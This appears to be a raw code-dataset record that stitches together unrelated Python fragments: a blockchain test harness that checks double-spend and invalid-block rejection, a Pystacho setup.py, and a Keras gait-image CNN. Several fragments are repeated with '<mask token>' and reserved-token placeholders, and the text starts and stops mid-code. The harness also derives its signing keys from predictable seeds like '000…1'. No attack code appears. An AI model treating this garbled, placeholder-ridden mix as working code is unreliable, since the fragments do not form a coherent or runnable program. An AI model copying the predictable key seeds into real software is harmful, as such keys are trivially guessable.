self.readTxFromFile('./TxFiles/PrevHashMatchTestTx.json')\n self.mvb.networkNodes[1].mineInvalidBlock(txList[0],\n isInvalidPrevHash=True)\n\n def blockPOWTest(self):\n log.info(\n '--------------------Block POW test now started-------------------'\n )\n log.info('Node 1 broadcast a Block with invalid POW to the other nodes'\n )\n txList = self.readTxFromFile('./TxFiles/BlockPOWTestTx.json')\n self.mvb.networkNodes[0].mineInvalidBlock(txList[0], isInvalidPOW=True)\n\n def threadMining(self, node: Node, i):\n nowTime = time.time()\n while True:\n sleep(random.uniform(0.05, 0.1))\n node.receiveBroadcastBlock()\n for tx in node.globalTxPool:\n node.mineBlock(tx)\n if node.globalTxPool:\n 
node.globalTxPool.remove(tx)\n if time.time() - nowTime > 15:\n break\n node.saveToFile()\n\n def createTxJsonFile(self, FILENAME: str, txList: List[Transaction]):\n txListJsonObj = {'txList': []}\n for tx in txList:\n txListJsonObj['txList'].append(tx.getJsonObj())\n with open(FILENAME, 'w', encoding='utf-8') as f:\n f.write(json.dumps(txListJsonObj, indent=4))\n\n def readTxFromFile(self, FILENAME: str) ->List[Transaction]:\n txList = []\n with open(FILENAME, 'r', encoding='utf-8') as f:\n txListJsonObj = json.load(f)\n for txObj in txListJsonObj['txList']:\n newTx = Transaction(jsonObj=txObj)\n txList.append(newTx)\n return txList\n\n def __initialSigningKeys(self) ->None:\n \"\"\"\n Generate and update signingKeys List for the network\n \"\"\"\n seedStr = '0' * 31\n seedNum = ['1', '2', '3', '4', '5', '6', '7', '8', '9', 'a', 'b',\n 'c', 'd', 'e', 'f']\n seedList = []\n for i in range(15):\n seed = seedStr + seedNum[i]\n seedList.append(seed.encode('utf-8'))\n for seed in seedList:\n self.signingKeysList.append(SigningKey(seed))\n log.info('15 signing keys have been generated successfully')\n\n def __initialPubKeys(self):\n for signingKey in self.signingKeysList:\n verifyKey = signingKey.verify_key\n verifyKeyByte = verifyKey.encode(encoder=HexEncoder)\n self.pubKeysList.append(verifyKey)\n self.pubKeysByteList.append(verifyKeyByte)\n log.info(str(len(self.pubKeysList)) +\n ' public keys have been generated successfully')\n",
"step-3": "<mask token>\ncoloredlogs.install()\nlogging.basicConfig(level=logging.INFO, format=\n '%(asctime)s - %(name)s - %(levelname)s - %(message)s')\nlog = logging.getLogger(__name__)\n\n\nclass MVBTest:\n\n def __init__(self, initialNodeCnt):\n self.mvb = MVB()\n self.signingKeysList = []\n self.pubKeysList = []\n self.pubKeysByteList = []\n self.__initialSigningKeys()\n self.__initialPubKeys()\n self.mvb.generateGenesisBlockFromJson()\n self.mvb.initialNodes(initialNodeCnt)\n for i, node in enumerate(self.mvb.networkNodes):\n nodeThread = Thread(target=self.threadMining, args=(node, 1))\n nodeThread.start()\n\n def multipleValidTxTest(self):\n \"\"\"\n This method tests multiple valid transactions\n \"\"\"\n log.info(\n '--------------------Multiple valid Tx tests now started-------------------'\n )\n self.mvb.txWaitingPool += self.readTxFromFile(\n './TxFiles/MultipleValidTestTx.json')\n self.mvb.broadcastTxPools()\n\n def doubleSpendTest(self):\n \"\"\"\n txOutputs is the genesis output.\n txOutputs[0] was used twice in this test.\n Both Tx1 and Tx2 make txOutputs[0] as input.\n When Tx2 is mined, the verification will be failed.\n \"\"\"\n log.info(\n '--------------------Double spend test now started-------------------'\n )\n log.info(\n 'A pair of valid and invalid transactions is added into GlobalTx Pool'\n )\n self.mvb.txWaitingPool += self.readTxFromFile(\n './TxFiles/DoubleSpendTestTx.json')\n self.mvb.broadcastTxPools()\n\n def inputOutputSumTest(self):\n log.info(\n '--------------------Input output sum test now started-------------------'\n )\n log.info(\n 'A pair of valid and invalid Transactions is added into GlobalTx Pool'\n )\n self.mvb.txWaitingPool += self.readTxFromFile(\n './TxFiles/InputOutputSumTestTx.json')\n self.mvb.broadcastTxPools()\n\n def sigVerifyTest(self):\n log.info(\n '--------------------Signature verify test now started-------------------'\n )\n log.info(\n 'A pair of valid and invalid Transactions is added into GlobalTx Pool'\n )\n self.mvb.txWaitingPool += self.readTxFromFile(\n './TxFiles/SigVerifyTestTx.json')\n self.mvb.broadcastTxPools()\n\n def numberHashTest(self):\n log.info(\n '--------------------Number hash test now started-------------------'\n )\n log.info(\n 'A pair of valid and invalid Transactions is added into GlobalTx Pool'\n )\n self.mvb.txWaitingPool += self.readTxFromFile(\n './TxFiles/NumberHashTestTx.json')\n self.mvb.broadcastTxPools()\n\n def txInputsExistTest(self):\n log.info(\n '--------------------Transaction inputs exist test now started-------------------'\n )\n log.info(\n 'A pair of valid and invalid Transactions is added into GlobalTx Pool'\n )\n self.mvb.txWaitingPool += self.readTxFromFile(\n './TxFiles/TxInputsExistTestTx.json')\n self.mvb.broadcastTxPools()\n\n def prevHashMatchTest(self):\n log.info(\n '--------------------Prev Hash test now started-------------------'\n )\n log.info(\n 'Node 2 broadcast a Block with invalid prev-hash to the other nodes'\n )\n txList = self.readTxFromFile('./TxFiles/PrevHashMatchTestTx.json')\n self.mvb.networkNodes[1].mineInvalidBlock(txList[0],\n isInvalidPrevHash=True)\n\n def blockPOWTest(self):\n log.info(\n '--------------------Block POW test now started-------------------'\n )\n log.info('Node 1 broadcast a Block with invalid POW to the other nodes'\n )\n txList = self.readTxFromFile('./TxFiles/BlockPOWTestTx.json')\n self.mvb.networkNodes[0].mineInvalidBlock(txList[0], isInvalidPOW=True)\n\n def threadMining(self, node: Node, i):\n nowTime = time.time()\n while 
True:\n sleep(random.uniform(0.05, 0.1))\n node.receiveBroadcastBlock()\n for tx in node.globalTxPool:\n node.mineBlock(tx)\n if node.globalTxPool:\n node.globalTxPool.remove(tx)\n if time.time() - nowTime > 15:\n break\n node.saveToFile()\n\n def createTxJsonFile(self, FILENAME: str, txList: List[Transaction]):\n txListJsonObj = {'txList': []}\n for tx in txList:\n txListJsonObj['txList'].append(tx.getJsonObj())\n with open(FILENAME, 'w', encoding='utf-8') as f:\n f.write(json.dumps(txListJsonObj, indent=4))\n\n def readTxFromFile(self, FILENAME: str) ->List[Transaction]:\n txList = []\n with open(FILENAME, 'r', encoding='utf-8') as f:\n txListJsonObj = json.load(f)\n for txObj in txListJsonObj['txList']:\n newTx = Transaction(jsonObj=txObj)\n txList.append(newTx)\n return txList\n\n def __initialSigningKeys(self) ->None:\n \"\"\"\n Generate and update signingKeys List for the network\n \"\"\"\n seedStr = '0' * 31\n seedNum = ['1', '2', '3', '4', '5', '6', '7', '8', '9', 'a', 'b',\n 'c', 'd', 'e', 'f']\n seedList = []\n for i in range(15):\n seed = seedStr + seedNum[i]\n seedList.append(seed.encode('utf-8'))\n for seed in seedList:\n self.signingKeysList.append(SigningKey(seed))\n log.info('15 signing keys have been generated successfully')\n\n def __initialPubKeys(self):\n for signingKey in self.signingKeysList:\n verifyKey = signingKey.verify_key\n verifyKeyByte = verifyKey.encode(encoder=HexEncoder)\n self.pubKeysList.append(verifyKey)\n self.pubKeysByteList.append(verifyKeyByte)\n log.info(str(len(self.pubKeysList)) +\n ' public keys have been generated successfully')\n",
"step-4": "import time\nimport random\nfrom BlockchainNetwork.MVB import *\nfrom threading import Thread\ncoloredlogs.install()\nlogging.basicConfig(level=logging.INFO, format=\n '%(asctime)s - %(name)s - %(levelname)s - %(message)s')\nlog = logging.getLogger(__name__)\n\n\nclass MVBTest:\n\n def __init__(self, initialNodeCnt):\n self.mvb = MVB()\n self.signingKeysList = []\n self.pubKeysList = []\n self.pubKeysByteList = []\n self.__initialSigningKeys()\n self.__initialPubKeys()\n self.mvb.generateGenesisBlockFromJson()\n self.mvb.initialNodes(initialNodeCnt)\n for i, node in enumerate(self.mvb.networkNodes):\n nodeThread = Thread(target=self.threadMining, args=(node, 1))\n nodeThread.start()\n\n def multipleValidTxTest(self):\n \"\"\"\n This method tests multiple valid transactions\n \"\"\"\n log.info(\n '--------------------Multiple valid Tx tests now started-------------------'\n )\n self.mvb.txWaitingPool += self.readTxFromFile(\n './TxFiles/MultipleValidTestTx.json')\n self.mvb.broadcastTxPools()\n\n def doubleSpendTest(self):\n \"\"\"\n txOutputs is the genesis output.\n txOutputs[0] was used twice in this test.\n Both Tx1 and Tx2 make txOutputs[0] as input.\n When Tx2 is mined, the verification will be failed.\n \"\"\"\n log.info(\n '--------------------Double spend test now started-------------------'\n )\n log.info(\n 'A pair of valid and invalid transactions is added into GlobalTx Pool'\n )\n self.mvb.txWaitingPool += self.readTxFromFile(\n './TxFiles/DoubleSpendTestTx.json')\n self.mvb.broadcastTxPools()\n\n def inputOutputSumTest(self):\n log.info(\n '--------------------Input output sum test now started-------------------'\n )\n log.info(\n 'A pair of valid and invalid Transactions is added into GlobalTx Pool'\n )\n self.mvb.txWaitingPool += self.readTxFromFile(\n './TxFiles/InputOutputSumTestTx.json')\n self.mvb.broadcastTxPools()\n\n def sigVerifyTest(self):\n log.info(\n '--------------------Signature verify test now started-------------------'\n )\n log.info(\n 'A pair of valid and invalid Transactions is added into GlobalTx Pool'\n )\n self.mvb.txWaitingPool += self.readTxFromFile(\n './TxFiles/SigVerifyTestTx.json')\n self.mvb.broadcastTxPools()\n\n def numberHashTest(self):\n log.info(\n '--------------------Number hash test now started-------------------'\n )\n log.info(\n 'A pair of valid and invalid Transactions is added into GlobalTx Pool'\n )\n self.mvb.txWaitingPool += self.readTxFromFile(\n './TxFiles/NumberHashTestTx.json')\n self.mvb.broadcastTxPools()\n\n def txInputsExistTest(self):\n log.info(\n '--------------------Transaction inputs exist test now started-------------------'\n )\n log.info(\n 'A pair of valid and invalid Transactions is added into GlobalTx Pool'\n )\n self.mvb.txWaitingPool += self.readTxFromFile(\n './TxFiles/TxInputsExistTestTx.json')\n self.mvb.broadcastTxPools()\n\n def prevHashMatchTest(self):\n log.info(\n '--------------------Prev Hash test now started-------------------'\n )\n log.info(\n 'Node 2 broadcast a Block with invalid prev-hash to the other nodes'\n )\n txList = self.readTxFromFile('./TxFiles/PrevHashMatchTestTx.json')\n self.mvb.networkNodes[1].mineInvalidBlock(txList[0],\n isInvalidPrevHash=True)\n\n def blockPOWTest(self):\n log.info(\n '--------------------Block POW test now started-------------------'\n )\n log.info('Node 1 broadcast a Block with invalid POW to the other nodes'\n )\n txList = self.readTxFromFile('./TxFiles/BlockPOWTestTx.json')\n self.mvb.networkNodes[0].mineInvalidBlock(txList[0], 
isInvalidPOW=True)\n\n def threadMining(self, node: Node, i):\n nowTime = time.time()\n while True:\n sleep(random.uniform(0.05, 0.1))\n node.receiveBroadcastBlock()\n for tx in node.globalTxPool:\n node.mineBlock(tx)\n if node.globalTxPool:\n node.globalTxPool.remove(tx)\n if time.time() - nowTime > 15:\n break\n node.saveToFile()\n\n def createTxJsonFile(self, FILENAME: str, txList: List[Transaction]):\n txListJsonObj = {'txList': []}\n for tx in txList:\n txListJsonObj['txList'].append(tx.getJsonObj())\n with open(FILENAME, 'w', encoding='utf-8') as f:\n f.write(json.dumps(txListJsonObj, indent=4))\n\n def readTxFromFile(self, FILENAME: str) ->List[Transaction]:\n txList = []\n with open(FILENAME, 'r', encoding='utf-8') as f:\n txListJsonObj = json.load(f)\n for txObj in txListJsonObj['txList']:\n newTx = Transaction(jsonObj=txObj)\n txList.append(newTx)\n return txList\n\n def __initialSigningKeys(self) ->None:\n \"\"\"\n Generate and update signingKeys List for the network\n \"\"\"\n seedStr = '0' * 31\n seedNum = ['1', '2', '3', '4', '5', '6', '7', '8', '9', 'a', 'b',\n 'c', 'd', 'e', 'f']\n seedList = []\n for i in range(15):\n seed = seedStr + seedNum[i]\n seedList.append(seed.encode('utf-8'))\n for seed in seedList:\n self.signingKeysList.append(SigningKey(seed))\n log.info('15 signing keys have been generated successfully')\n\n def __initialPubKeys(self):\n for signingKey in self.signingKeysList:\n verifyKey = signingKey.verify_key\n verifyKeyByte = verifyKey.encode(encoder=HexEncoder)\n self.pubKeysList.append(verifyKey)\n self.pubKeysByteList.append(verifyKeyByte)\n log.info(str(len(self.pubKeysList)) +\n ' public keys have been generated successfully')\n",
"step-5": "import time\nimport random\n\nfrom BlockchainNetwork.MVB import *\nfrom threading import Thread\n\ncoloredlogs.install()\nlogging.basicConfig(level=logging.INFO, format='%(asctime)s - %(name)s - %(levelname)s - %(message)s')\nlog = logging.getLogger(__name__)\n\n\nclass MVBTest:\n def __init__(self, initialNodeCnt):\n self.mvb = MVB()\n self.signingKeysList = []\n self.pubKeysList = []\n self.pubKeysByteList = []\n self.__initialSigningKeys()\n self.__initialPubKeys()\n\n self.mvb.generateGenesisBlockFromJson()\n self.mvb.initialNodes(initialNodeCnt)\n\n for i, node in enumerate(self.mvb.networkNodes):\n nodeThread = Thread(target=self.threadMining, args=(node, 1))\n nodeThread.start()\n\n def multipleValidTxTest(self):\n \"\"\"\n This method tests multiple valid transactions\n \"\"\"\n log.info(\"--------------------Multiple valid Tx tests now started-------------------\")\n\n self.mvb.txWaitingPool += self.readTxFromFile('./TxFiles/MultipleValidTestTx.json')\n self.mvb.broadcastTxPools()\n\n def doubleSpendTest(self):\n \"\"\"\n txOutputs is the genesis output.\n txOutputs[0] was used twice in this test.\n Both Tx1 and Tx2 make txOutputs[0] as input.\n When Tx2 is mined, the verification will be failed.\n \"\"\"\n log.info(\"--------------------Double spend test now started-------------------\")\n log.info(\"A pair of valid and invalid transactions is added into GlobalTx Pool\")\n\n self.mvb.txWaitingPool += self.readTxFromFile('./TxFiles/DoubleSpendTestTx.json')\n self.mvb.broadcastTxPools()\n\n def inputOutputSumTest(self):\n log.info(\"--------------------Input output sum test now started-------------------\")\n log.info(\"A pair of valid and invalid Transactions is added into GlobalTx Pool\")\n\n self.mvb.txWaitingPool += self.readTxFromFile('./TxFiles/InputOutputSumTestTx.json')\n self.mvb.broadcastTxPools()\n\n def sigVerifyTest(self):\n log.info(\"--------------------Signature verify test now started-------------------\")\n log.info(\"A pair of valid and invalid Transactions is added into GlobalTx Pool\")\n\n self.mvb.txWaitingPool += self.readTxFromFile('./TxFiles/SigVerifyTestTx.json')\n self.mvb.broadcastTxPools()\n\n def numberHashTest(self):\n log.info(\"--------------------Number hash test now started-------------------\")\n log.info(\"A pair of valid and invalid Transactions is added into GlobalTx Pool\")\n\n self.mvb.txWaitingPool += self.readTxFromFile('./TxFiles/NumberHashTestTx.json')\n self.mvb.broadcastTxPools()\n\n def txInputsExistTest(self):\n log.info(\"--------------------Transaction inputs exist test now started-------------------\")\n log.info(\"A pair of valid and invalid Transactions is added into GlobalTx Pool\")\n\n self.mvb.txWaitingPool += self.readTxFromFile('./TxFiles/TxInputsExistTestTx.json')\n self.mvb.broadcastTxPools()\n\n def prevHashMatchTest(self):\n log.info(\"--------------------Prev Hash test now started-------------------\")\n log.info(\"Node 2 broadcast a Block with invalid prev-hash to the other nodes\")\n\n txList = self.readTxFromFile('./TxFiles/PrevHashMatchTestTx.json')\n self.mvb.networkNodes[1].mineInvalidBlock(txList[0], isInvalidPrevHash=True)\n\n def blockPOWTest(self):\n log.info(\"--------------------Block POW test now started-------------------\")\n log.info(\"Node 1 broadcast a Block with invalid POW to the other nodes\")\n\n txList = self.readTxFromFile('./TxFiles/BlockPOWTestTx.json')\n self.mvb.networkNodes[0].mineInvalidBlock(txList[0], isInvalidPOW=True)\n\n def threadMining(self, node: Node, i):\n nowTime = 
time.time()\n while True:\n sleep(random.uniform(0.05, 0.1))\n node.receiveBroadcastBlock()\n for tx in node.globalTxPool:\n node.mineBlock(tx)\n if node.globalTxPool:\n node.globalTxPool.remove(tx)\n if time.time() - nowTime > 15:\n break\n\n node.saveToFile()\n\n def createTxJsonFile(self, FILENAME: str, txList: List[Transaction]):\n txListJsonObj = {'txList': []}\n for tx in txList:\n txListJsonObj['txList'].append(tx.getJsonObj())\n with open(FILENAME, 'w', encoding='utf-8') as f:\n f.write(json.dumps(txListJsonObj, indent=4))\n\n def readTxFromFile(self, FILENAME: str) -> List[Transaction]:\n txList = []\n with open(FILENAME, 'r', encoding='utf-8') as f:\n txListJsonObj = json.load(f)\n for txObj in txListJsonObj['txList']:\n newTx = Transaction(jsonObj=txObj)\n txList.append(newTx)\n return txList\n\n def __initialSigningKeys(self) -> None:\n \"\"\"\n Generate and update signingKeys List for the network\n \"\"\"\n seedStr = '0' * 31\n seedNum = ['1', '2', '3', '4', '5', '6', '7', '8', '9', 'a', 'b', 'c', 'd', 'e', 'f']\n seedList = []\n for i in range(15):\n seed = seedStr + seedNum[i]\n seedList.append(seed.encode('utf-8'))\n\n for seed in seedList:\n self.signingKeysList.append(SigningKey(seed))\n log.info(\"15 signing keys have been generated successfully\")\n\n def __initialPubKeys(self):\n for signingKey in self.signingKeysList:\n verifyKey = signingKey.verify_key\n verifyKeyByte = verifyKey.encode(encoder=HexEncoder)\n self.pubKeysList.append(verifyKey)\n self.pubKeysByteList.append(verifyKeyByte)\n log.info(str(len(self.pubKeysList)) + \" public keys have been generated successfully\")\n",
"step-ids": [
11,
15,
17,
18,
19
]
}
|
[
11,
15,
17,
18,
19
] |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# This file is part of the
# Pystacho Project (https://github.com/aruderman/pystacho/).
# Copyright (c) 2021, Francisco Fernandez, Benjamin Marcologno, Andrés Ruderman
# License: MIT
# Full Text: https://github.com/aruderman/pystacho/blob/master/LICENSE
# =====================================================================
# DOCS
# =====================================================================
"""This file is for distribute and install Pystacho"""
# ======================================================================
# IMPORTS
# ======================================================================
import os
import pathlib
from setuptools import setup
# =============================================================================
# CONSTANTS
# =============================================================================
PATH = pathlib.Path(os.path.abspath(os.path.dirname(__file__)))
REQUIREMENTS = [
"diskcache",
"numpy",
"pandas",
"matplotlib",
"pymatgen",
"seaborn",
"lightgbm",
"matminer",
"scikit-learn",
]
with open(PATH / "pystacho" / "__init__.py") as fp:
for line in fp.readlines():
if line.startswith("__version__ = "):
VERSION = line.split("=", 1)[-1].replace('"', "").strip()
break
with open("README.md") as fp:
LONG_DESCRIPTION = fp.read()
# =============================================================================
# FUNCTIONS
# =============================================================================
setup(
name="Pystacho",
version=VERSION,
description="ESCRIBIR DESCRIPCION DEL PROYECTO",
long_description=LONG_DESCRIPTION,
long_description_content_type="text/markdown",
author=["Francisco Fernandez", "Benjamin Marcologno", "Andrés Ruderman"],
author_email="[email protected]",
url="https://github.com/aruderman/pystacho",
packages=["pystacho"],
license="The MIT License",
install_requires=REQUIREMENTS,
keywords=["pystacho"],
classifiers=[
"Development Status :: 4 - Beta",
"Intended Audience :: Education",
"Intended Audience :: Science/Research",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
"Programming Language :: Python",
"Programming Language :: Python :: 3.8",
"Programming Language :: Python :: Implementation :: CPython",
"Topic :: Scientific/Engineering",
],
# include_package_data=True,
)
|
normal
|
{
"blob_id": "d7e24730ce9f2835d55d3995abec2a7d00eb05ef",
"index": 9024,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nwith open(PATH / 'pystacho' / '__init__.py') as fp:\n for line in fp.readlines():\n if line.startswith('__version__ = '):\n VERSION = line.split('=', 1)[-1].replace('\"', '').strip()\n break\nwith open('README.md') as fp:\n LONG_DESCRIPTION = fp.read()\nsetup(name='Pystacho', version=VERSION, description=\n 'ESCRIBIR DESCRIPCION DEL PROYECTO', long_description=LONG_DESCRIPTION,\n long_description_content_type='text/markdown', author=[\n 'Francisco Fernandez', 'Benjamin Marcologno', 'Andrés Ruderman'],\n author_email='[email protected]', url=\n 'https://github.com/aruderman/pystacho', packages=['pystacho'], license\n ='The MIT License', install_requires=REQUIREMENTS, keywords=['pystacho'\n ], classifiers=['Development Status :: 4 - Beta',\n 'Intended Audience :: Education',\n 'Intended Audience :: Science/Research',\n 'License :: OSI Approved :: MIT License',\n 'Operating System :: OS Independent', 'Programming Language :: Python',\n 'Programming Language :: Python :: 3.8',\n 'Programming Language :: Python :: Implementation :: CPython',\n 'Topic :: Scientific/Engineering'])\n",
"step-3": "<mask token>\nPATH = pathlib.Path(os.path.abspath(os.path.dirname(__file__)))\nREQUIREMENTS = ['diskcache', 'numpy', 'pandas', 'matplotlib', 'pymatgen',\n 'seaborn', 'lightgbm', 'matminer', 'scikit-learn']\nwith open(PATH / 'pystacho' / '__init__.py') as fp:\n for line in fp.readlines():\n if line.startswith('__version__ = '):\n VERSION = line.split('=', 1)[-1].replace('\"', '').strip()\n break\nwith open('README.md') as fp:\n LONG_DESCRIPTION = fp.read()\nsetup(name='Pystacho', version=VERSION, description=\n 'ESCRIBIR DESCRIPCION DEL PROYECTO', long_description=LONG_DESCRIPTION,\n long_description_content_type='text/markdown', author=[\n 'Francisco Fernandez', 'Benjamin Marcologno', 'Andrés Ruderman'],\n author_email='[email protected]', url=\n 'https://github.com/aruderman/pystacho', packages=['pystacho'], license\n ='The MIT License', install_requires=REQUIREMENTS, keywords=['pystacho'\n ], classifiers=['Development Status :: 4 - Beta',\n 'Intended Audience :: Education',\n 'Intended Audience :: Science/Research',\n 'License :: OSI Approved :: MIT License',\n 'Operating System :: OS Independent', 'Programming Language :: Python',\n 'Programming Language :: Python :: 3.8',\n 'Programming Language :: Python :: Implementation :: CPython',\n 'Topic :: Scientific/Engineering'])\n",
"step-4": "<mask token>\nimport os\nimport pathlib\nfrom setuptools import setup\nPATH = pathlib.Path(os.path.abspath(os.path.dirname(__file__)))\nREQUIREMENTS = ['diskcache', 'numpy', 'pandas', 'matplotlib', 'pymatgen',\n 'seaborn', 'lightgbm', 'matminer', 'scikit-learn']\nwith open(PATH / 'pystacho' / '__init__.py') as fp:\n for line in fp.readlines():\n if line.startswith('__version__ = '):\n VERSION = line.split('=', 1)[-1].replace('\"', '').strip()\n break\nwith open('README.md') as fp:\n LONG_DESCRIPTION = fp.read()\nsetup(name='Pystacho', version=VERSION, description=\n 'ESCRIBIR DESCRIPCION DEL PROYECTO', long_description=LONG_DESCRIPTION,\n long_description_content_type='text/markdown', author=[\n 'Francisco Fernandez', 'Benjamin Marcologno', 'Andrés Ruderman'],\n author_email='[email protected]', url=\n 'https://github.com/aruderman/pystacho', packages=['pystacho'], license\n ='The MIT License', install_requires=REQUIREMENTS, keywords=['pystacho'\n ], classifiers=['Development Status :: 4 - Beta',\n 'Intended Audience :: Education',\n 'Intended Audience :: Science/Research',\n 'License :: OSI Approved :: MIT License',\n 'Operating System :: OS Independent', 'Programming Language :: Python',\n 'Programming Language :: Python :: 3.8',\n 'Programming Language :: Python :: Implementation :: CPython',\n 'Topic :: Scientific/Engineering'])\n",
"step-5": "#!/usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\n\r\n# This file is part of the\r\n# Pystacho Project (https://github.com/aruderman/pystacho/).\r\n# Copyright (c) 2021, Francisco Fernandez, Benjamin Marcologno, Andrés Ruderman\r\n# License: MIT\r\n# Full Text: https://github.com/aruderman/pystacho/blob/master/LICENSE\r\n\r\n# =====================================================================\r\n# DOCS\r\n# =====================================================================\r\n\r\n\"\"\"This file is for distribute and install Pystacho\"\"\"\r\n\r\n# ======================================================================\r\n# IMPORTS\r\n# ======================================================================\r\n\r\nimport os\r\nimport pathlib\r\n\r\nfrom setuptools import setup\r\n\r\n# =============================================================================\r\n# CONSTANTS\r\n# =============================================================================\r\n\r\nPATH = pathlib.Path(os.path.abspath(os.path.dirname(__file__)))\r\n\r\n\r\nREQUIREMENTS = [\r\n \"diskcache\",\r\n \"numpy\",\r\n \"pandas\",\r\n \"matplotlib\",\r\n \"pymatgen\",\r\n \"seaborn\",\r\n \"lightgbm\",\r\n \"matminer\",\r\n \"scikit-learn\",\r\n]\r\n\r\nwith open(PATH / \"pystacho\" / \"__init__.py\") as fp:\r\n for line in fp.readlines():\r\n if line.startswith(\"__version__ = \"):\r\n VERSION = line.split(\"=\", 1)[-1].replace('\"', \"\").strip()\r\n break\r\n\r\n\r\nwith open(\"README.md\") as fp:\r\n LONG_DESCRIPTION = fp.read()\r\n\r\n\r\n# =============================================================================\r\n# FUNCTIONS\r\n# =============================================================================\r\n\r\nsetup(\r\n name=\"Pystacho\",\r\n version=VERSION,\r\n description=\"ESCRIBIR DESCRIPCION DEL PROYECTO\",\r\n long_description=LONG_DESCRIPTION,\r\n long_description_content_type=\"text/markdown\",\r\n author=[\"Francisco Fernandez\", \"Benjamin Marcologno\", \"Andrés Ruderman\"],\r\n author_email=\"[email protected]\",\r\n url=\"https://github.com/aruderman/pystacho\",\r\n packages=[\"pystacho\"],\r\n license=\"The MIT License\",\r\n install_requires=REQUIREMENTS,\r\n keywords=[\"pystacho\"],\r\n classifiers=[\r\n \"Development Status :: 4 - Beta\",\r\n \"Intended Audience :: Education\",\r\n \"Intended Audience :: Science/Research\",\r\n \"License :: OSI Approved :: MIT License\",\r\n \"Operating System :: OS Independent\",\r\n \"Programming Language :: Python\",\r\n \"Programming Language :: Python :: 3.8\",\r\n \"Programming Language :: Python :: Implementation :: CPython\",\r\n \"Topic :: Scientific/Engineering\",\r\n ],\r\n # include_package_data=True,\r\n)\r\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
np.random.seed(7)
<|reserved_special_token_0|>
tf.keras.backend.set_session(tf.Session(config=config))
np.set_printoptions(threshold=np.nan)
<|reserved_special_token_0|>
with open('gei.txt', 'rb') as fr:
x_train = pickle.load(fr)
y_train = pickle.load(fr)
print('pickle successfully read')
<|reserved_special_token_0|>
model.add(Conv2D(32, kernel_size=(5, 5), strides=(1, 1), padding='same',
activation='relu', input_shape=input_shape))
model.add(MaxPooling2D(pool_size=(2, 2), strides=(2, 2)))
model.add(Conv2D(64, kernel_size=(2, 2), strides=(1, 1), padding='same',
activation='relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Dropout(0.2))
model.add(Flatten())
model.add(Dense(1000, activation='relu'))
model.add(Dropout(0.5))
model.add(Dense(num_classes, activation='softmax'))
model.summary()
model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=[
'accuracy'])
<|reserved_special_token_0|>
print('Test loss : ', score[0])
print('Test Accuracy : ', score[1])
<|reserved_special_token_1|>
<|reserved_special_token_0|>
np.random.seed(7)
config = tf.ConfigProto()
config.gpu_options.per_process_gpu_memory_fraction = 0.8
tf.keras.backend.set_session(tf.Session(config=config))
np.set_printoptions(threshold=np.nan)
x_train = []
y_train = []
x_test = []
y_test = []
path = './200305_gei'
list = os.listdir(path)
i = 0
with open('gei.txt', 'rb') as fr:
x_train = pickle.load(fr)
y_train = pickle.load(fr)
print('pickle successfully read')
x_train, x_test, y_train, y_test = train_test_split(x_train, y_train,
test_size=0.2)
input_shape = 128, 96, 1
batch_size = 128
num_classes = 128
epochs = 100
x_train = np.array(x_train)
x_test = np.array(x_test)
y_train = np.array(y_train)
y_test = np.array(y_test)
x_train = np.expand_dims(x_train, axis=3)
x_test = np.expand_dims(x_test, axis=3)
x_train = x_train.astype('float32') / 255
x_test = x_test.astype('float32') / 255
y_train = keras.utils.to_categorical(y_train, num_classes)
y_test = keras.utils.to_categorical(y_test, num_classes)
model = Sequential()
model.add(Conv2D(32, kernel_size=(5, 5), strides=(1, 1), padding='same',
activation='relu', input_shape=input_shape))
model.add(MaxPooling2D(pool_size=(2, 2), strides=(2, 2)))
model.add(Conv2D(64, kernel_size=(2, 2), strides=(1, 1), padding='same',
activation='relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Dropout(0.2))
model.add(Flatten())
model.add(Dense(1000, activation='relu'))
model.add(Dropout(0.5))
model.add(Dense(num_classes, activation='softmax'))
model.summary()
model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=[
'accuracy'])
history = model.fit(x_train, y_train, batch_size=batch_size, epochs=epochs,
verbose=1, validation_data=(x_test, y_test))
score = model.evaluate(x_test, y_test, verbose=0)
print('Test loss : ', score[0])
print('Test Accuracy : ', score[1])
<|reserved_special_token_1|>
import sys
import os
import tensorflow as tf
import keras
from cv2 import *
from keras.models import Sequential
from keras.layers import Dense, Dropout, Flatten
from PIL import Image
import numpy as np
import pickle
from sklearn.model_selection import train_test_split
from keras.utils import np_utils
from keras.layers import Dense, Conv2D, MaxPooling2D, Dropout, Flatten
from keras.callbacks import ModelCheckpoint, EarlyStopping
np.random.seed(7)
config = tf.ConfigProto()
config.gpu_options.per_process_gpu_memory_fraction = 0.8
tf.keras.backend.set_session(tf.Session(config=config))
np.set_printoptions(threshold=np.nan)
x_train = []
y_train = []
x_test = []
y_test = []
path = './200305_gei'
list = os.listdir(path)
i = 0
with open('gei.txt', 'rb') as fr:
x_train = pickle.load(fr)
y_train = pickle.load(fr)
print('pickle successfully read')
x_train, x_test, y_train, y_test = train_test_split(x_train, y_train,
test_size=0.2)
input_shape = 128, 96, 1
batch_size = 128
num_classes = 128
epochs = 100
x_train = np.array(x_train)
x_test = np.array(x_test)
y_train = np.array(y_train)
y_test = np.array(y_test)
x_train = np.expand_dims(x_train, axis=3)
x_test = np.expand_dims(x_test, axis=3)
x_train = x_train.astype('float32') / 255
x_test = x_test.astype('float32') / 255
y_train = keras.utils.to_categorical(y_train, num_classes)
y_test = keras.utils.to_categorical(y_test, num_classes)
model = Sequential()
model.add(Conv2D(32, kernel_size=(5, 5), strides=(1, 1), padding='same',
activation='relu', input_shape=input_shape))
model.add(MaxPooling2D(pool_size=(2, 2), strides=(2, 2)))
model.add(Conv2D(64, kernel_size=(2, 2), strides=(1, 1), padding='same',
activation='relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Dropout(0.2))
model.add(Flatten())
model.add(Dense(1000, activation='relu'))
model.add(Dropout(0.5))
model.add(Dense(num_classes, activation='softmax'))
model.summary()
model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=[
'accuracy'])
history = model.fit(x_train, y_train, batch_size=batch_size, epochs=epochs,
